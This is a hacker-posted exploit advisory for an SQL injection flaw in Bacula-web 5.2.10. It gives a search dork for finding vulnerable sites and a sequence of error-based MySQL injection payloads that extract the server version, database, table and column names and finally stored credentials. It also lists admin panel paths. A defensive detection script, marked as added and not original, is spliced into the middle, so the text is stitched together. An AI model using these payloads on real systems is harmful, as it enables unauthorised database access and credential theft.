
Bacula-web 5.2.10 Sql Injection Vulnerability

Author: isdo213 , Published: 08-10-2014
# Exploit Title : Bacula-web 5.2.10 Sql Injection Vulnerability
# Discovered By : isdo213
# Vendor : http://www.bacula-web.org/
# Contact : https://www.facebook.com/exploiterdz
# Date : 2014-10-07
###############################################################################
# Dork : "jobid=" bacula-web
###############################################################################

# p0c :


# code: 'and(select 1 from(select count(*),concat((select (select concat(version(),0x00)) from information_schema.tables limit 0,1),floor(rand(0)*2)) as x from information_schema.tables group by x)a)and'


This code will return something like this
code: Duplicate entry '5.5.32-0ubuntu0.12.10.1' for key 'group_key'


Then get the name of the database using the following code. All we need to do is replace version() in the previous query with database().
code: 'and(select 1 from(select count(*),concat((select (select concat(database(),0x00)) from information_schema.tables limit 0,1),floor(rand(0)*2)) as x from information_schema.tables group by x)a)and'

That will return something like this
code: Duplicate entry 'security' for key 'group_key'

So now we find out the username used to connect to the database. The query is the same as the one used to get the database name, except that database() is changed to user().
code: 'and(select 1 from(select count(*),concat((select (select concat(user(),0x00)) from information_schema.tables limit 0,1),floor(rand(0)*2)) as x from information_schema.tables group by x)a)and'


Will return something like
code: Duplicate entry 'root@localhost' for key 'group_key'



Now, this is all good, but we can not stop here. It is now time to start looking for the most important details. :)

Let us first find out how many databases the server has. To do this, run the following code
code: 'and(select 1 from(select count(*),concat((select (select (select concat(0x7e,count(schema_name),0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'


This will return output like the following, where 12 is the number of databases
code: Duplicate entry '~12~1' for key 'group_key'



Now let's discover the names of these databases. This can be done with the following injection. For the next database name, just increase the first number in the first limit clause
code: 'and(select 1 from(select count(*),concat((select (select (select concat(schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'



That will produce an output similar to this
code: Duplicate entry 'information_schema~1' for key 'group_key'



When you find the target database, let's proceed.

The first thing we do is count the number of tables in it. No need to waste time with some empty database :) Let's inject the following (replace [DATABASE] with the name of the database you want to use. Either as a string or as hex)
code: 'and(select 1 from(select count(*),concat((select (select (select concat(0x7e,count(table_name),0x7e) from information_schema.tables where table_schema=[DATABASE] limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'



This will display output like this, and four is the number of database tables.
code: Duplicate entry '~4~1' for key 'group_key'


Then we will find the names of the tables, which can be done with the following injection
code: 'and(select 1 from(select count(*),concat((select (select (select concat(0x7e,table_name,0x7e) from information_schema.tables where table_schema=[DATABASE] limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'


Again, to get the next table name, increase the first number in the first limit clause.

This returns something like this.
code: Duplicate entry '~emails~1' for key 'group_key'

When we find an interesting table, we do for its columns what we did for the tables.

So first we count the number of columns in the table. To do this, inject the following code
code: 'and(select 1 from(select count(*),concat((select (select (select concat(0x7e,count(column_name),0x7e) from information_schema.columns where table_name=[TABLE NAME] limit 0,1)) from information_schema.columns limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)and'



Again, to get the next column name, increase the first number in the first limit clause.

This returns something like this
code: Duplicate entry '~2~1' for key 'group_key'




Now we want to get the names of the columns, which can be done with the following injection
code: 'and(select 1 from(select count(*),concat((select (select (select concat(0x7e,column_name,0x7e) from information_schema.columns where table_name=[TABLE NAME] limit 0,1)) from information_schema.columns limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)and'




Again, increase the first number in the first limit clause to get the name of the next column!

If done correctly, it will print something like
code: Duplicate entry '~id~1' for key 'group_key'




And finally, now that we've gotten this far, it's time to get the important data :D

To obtain these values, we inject the following (replace [COLUMN] with the column names found in the previous step)
code: 'and(select 1 from(select count(*),concat((select concat([COLUMN],0x3a,[COLUMN]) from [TABLE NAME] limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'




To get the information for the next column, first increase the number in the limit clause :D

The output will be something like this.
code: Duplicate entry 'superman:genious1' for key 'group_key'
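
For defenders, the requests and responses in this walkthrough have a recognisable shape. The following Python sketch is an added example, not part of the original advisory or of Bacula-web's code: it checks that the `jobid` parameter from the dork is a plain integer, flags the payload fragments used above, and spots the leaked `Duplicate entry ... 'group_key'` error in a response body. The `/index.php` path, the integer assumption for `jobid` and all sample inputs are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, quote, urlsplit

# Fragments shared by every payload on this page, matched on the URL-decoded,
# lower-cased parameter value with whitespace removed.
MARKERS = {
    "rand_floor": re.compile(r"floor\(rand\(\d*\)\*2\)"),
    "group_by": re.compile(r"groupby"),
    "info_schema": re.compile(r"information_schema\."),
    "subselect": re.compile(r"\(select"),
}
JOBID_OK = re.compile(r"\A[0-9]{1,10}\Z")  # assumption: jobid is a plain integer
# MySQL error text the page shows being echoed back to the client.
LEAK = re.compile(r"Duplicate entry '([^']*)' for key 'group_key'")


def inspect_request(url):
    """Return (jobid_is_valid, sorted names of payload markers in the query)."""
    jobid_valid, hits = True, set()
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if name.lower() == "jobid" and not JOBID_OK.match(value):
            jobid_valid = False
        squashed = re.sub(r"\s+", "", value.lower())
        hits.update(k for k, rx in MARKERS.items() if rx.search(squashed))
    return jobid_valid, sorted(hits)


def leaked_value(body):
    """Return the value exposed by a duplicate-key error in a response body."""
    match = LEAK.search(body)
    return match.group(1) if match else None


# Constructed samples; /index.php is a placeholder path, not taken from the page.
BENIGN = "/index.php?jobid=42"
INJECTED = "/index.php?jobid=1" + quote(
    "'and(select 1 from(select count(*),concat((select (select "
    "concat(version(),0x00)) from information_schema.tables limit 0,1),"
    "floor(rand(0)*2)) as x from information_schema.tables group by x)a)and'"
)
ERROR_PAGE = "<p>Duplicate entry '5.5.32-0ubuntu0.12.10.1' for key 'group_key'</p>"

if __name__ == "__main__":
    for url in (BENIGN, INJECTED):
        print(url[:40], inspect_request(url))
    print(leaked_value(ERROR_PAGE))
```

Rejecting any non-integer `jobid` before it reaches the query, and not echoing database errors to the client, removes both the injection point and the error channel these payloads depend on.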


###############################################################################



#NOTE:
Be Unbreakable

Be Urself

Start

try to p0st ur idea

nothing can stop u

<3 peace <3


###############################################################################

My Youtube Channel : https://www.youtube.com/user/th3isdo




# admin panel : www.site.com/admin

www.site.com/adm

www.site.com/wp-admin

www.site.com/cp





###############################################################################







# Greetz To : Me ( isdo213 ) =D ; The Least hacker ; Iq-Team ; Gaza-Hacker ; Younes fc Saw ; Mustapha hisso ; My l0ve .






<3 1.2.3 vive L'algerie <3




<3 Je t'aime bibichti <3


<3 I love Gaza <3



<3 peace <3



<3 Ouled Mimoun <3
<3 expl0t3r Dz isdo <3

<3

###############################################################################
